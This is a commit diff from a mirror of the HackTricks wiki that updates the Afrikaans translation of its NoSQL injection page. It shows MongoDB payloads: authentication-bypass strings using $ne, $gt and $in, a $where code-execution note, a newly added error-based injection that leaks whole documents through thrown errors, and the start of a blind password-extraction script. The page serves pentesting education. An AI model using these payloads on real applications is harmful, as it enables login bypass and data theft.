mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/pentesting-web/nosql-injection.md'] to af
This commit is contained in:
parent
25ef2626a3
commit
936ce1b64a
@ -17,9 +17,9 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
|
|||||||
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
|
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
|
||||||
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
|
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
|
||||||
```
|
```
|
||||||
### Basiese outentikasie omseiling
|
### Basiese outentisering omseiling
|
||||||
|
|
||||||
**Gebruik nie gelyk ($ne) of groter ($gt)**
|
**Gebruik nie gelyk aan ($ne) of groter as ($gt)**
|
||||||
```bash
|
```bash
|
||||||
#in URL
|
#in URL
|
||||||
username[$ne]=toto&password[$ne]=toto
|
username[$ne]=toto&password[$ne]=toto
|
||||||
@ -108,6 +108,12 @@ Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/o
|
|||||||
}
|
}
|
||||||
]
|
]
|
||||||
```
|
```
|
||||||
|
### Foutgebaseerde Inspuiting
|
||||||
|
|
||||||
|
Inject `throw new Error(JSON.stringify(this))` in 'n `$where` klousule om volle dokumente via bediener-kant JavaScript-foute te eksfiltreer (vereis dat die toepassing databasisfoute lek). Voorbeeld:
|
||||||
|
```json
|
||||||
|
{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" }
|
||||||
|
```
|
||||||
## MongoDB Payloads
|
## MongoDB Payloads
|
||||||
|
|
||||||
Lys [van hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
|
Lys [van hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
|
||||||
@ -140,7 +146,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||||||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||||
```
|
```
|
||||||
## Blind NoSQL Skrip
|
## Blind NoSQL Script
|
||||||
```python
|
```python
|
||||||
import requests, string
|
import requests, string
|
||||||
|
|
||||||
@ -229,5 +235,6 @@ get_password(u)
|
|||||||
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
|
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
|
||||||
- [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
|
- [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
|
||||||
- [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
|
- [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
|
||||||
|
- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/)
|
||||||
|
|
||||||
{{#include ../banners/hacktricks-training.md}}
|
{{#include ../banners/hacktricks-training.md}}
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user